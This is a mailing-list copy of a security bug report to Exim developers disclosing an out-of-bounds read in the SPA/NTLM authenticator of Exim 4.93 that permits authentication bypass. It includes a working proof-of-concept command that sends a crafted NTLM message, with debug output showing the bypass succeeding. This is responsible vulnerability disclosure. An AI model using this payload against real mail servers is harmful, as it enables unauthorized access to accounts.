[exim-dev] [Bug 2571] New: Out-of-bound buffer read leads to…

Góra strony
Delete this message
Reply to this message
Autor: admin
Data:  
Dla: exim-dev
Temat: [exim-dev] [Bug 2571] New: Out-of-bound buffer read leads to authentication bypass in Exim SPA authentication method
https://bugs.exim.org/show_bug.cgi?id=2571

            Bug ID: 2571
           Summary: Out-of-bound buffer read leads to authentication
                    bypass in Exim SPA authentication method
           Product: Exim
           Version: 4.93
          Hardware: x86-64
                OS: Linux
            Status: NEW
          Severity: security
          Priority: medium
         Component: SMTP Authentication
          Assignee: jgh146exb@???
          Reporter: orange@???
                CC: exim-dev@???


Hi, Exim security team.

I am Orange Tsai from DEVCORE security team. We just did a little audit on
authentication mechanisms, and found a out-of-bound buffer read on SPA
implementation.

In `spa.c`, there is no check on the user-supplied NTLM authentication message.
Since NTLM is an encoded structure. An attacker can supply customized `length`
and `offset` to read arbitrary memory address.

For example:

The SPA username/password challenge check is in `spa.c#248`.
https://github.com/Exim/exim/blob/master/src/src/auths/spa.c#L249

Since we control whole the `responseptr`, we can adjust the `offset` to the
address of `ntRespData` to bypass this authentication. Here is the PoC:

```
$ (echo 'EHLO test.org'; echo AUTH NTLM; echo "AAAA";    echo -ne


'o\x00r\x00a\x00n\x00g\x00e\x00\x00BDDCCCCBBGG\x70\x04\x00\x00BBCCCC\x0e\x00\x0e\x00\x0e\x00\x00\x00\x00\x00'
| b

ase64 -w0 ; echo ; echo QUIT) | ./exim -bh 127.0.0.1

**** SMTP testing session as if from host 127.0.0.1
**** but without any ident (RFC 1413) callback.
**** This is not for real!

>>> host in hosts_connection_nolog? no (option unset)
>>> host in host_lookup? yes (matched "*")
>>> looking up host name for 127.0.0.1
>>> IP address lookup using gethostbyaddr()
>>> IP address lookup yielded "localhost.localdomain"
>>> alias "localhost"
>>> no IP addresses found for localhost.localdomain
>>> no IP addresses found for localhost
>>> 127.0.0.1 does not match any IP address for localhost.localdomain
>>> host in host_reject_connection? no (option unset)
>>> host in sender_unqualified_hosts? no (option unset)
>>> host in recipient_unqualified_hosts? no (option unset)
>>> host in helo_verify_hosts? no (option unset)
>>> host in helo_try_verify_hosts? no (option unset)
>>> host in helo_accept_junk_hosts? no (option unset)

220 ubuntu ESMTP Exim 4.93 Sun, 03 May 2020 10:25:45 +0800
>>> test.org in helo_lookup_domains? no (end of list)
>>> host in dsn_advertise_hosts? no (option unset)
>>> host in pipelining_advertise_hosts? yes (matched "*")
>>> host in auth_advertise_hosts? yes (matched "*")
>>> host in chunking_advertise_hosts? yes (matched "*")
>>> host in tls_advertise_hosts? yes (matched "*")

250-ubuntu Hello test.org [127.0.0.1]
250-SIZE 52428800
250-8BITMIME
250-PIPELINING
250-AUTH NTLM
250-CHUNKING
250-STARTTLS
250-PRDR
250 HELP
334 NTLM supported
334 TlRMTVNTUAACAAAAAAAAAAAoAAABggAAEDPISlBkLXQAAAAAAAAAAAAAAAAAAAAA
>>> spa authenticator server_condition:
>>> $auth1 = orange
>>> $1 = orange

235 Authentication succeeded
221 ubuntu closing connection
```


Our configuration:

```
$ cat /usr/exim/configure
...

spa:
driver = spa
public_name = NTLM
server_password =
${lookup{$auth1}lsearch{/etc/exim/spa_clearpass}{$value}fail}
...

$ cat /etc/exim/spa_clearpass
orange:orange
```

--
You are receiving this mail because:
You are on the CC list for the bug.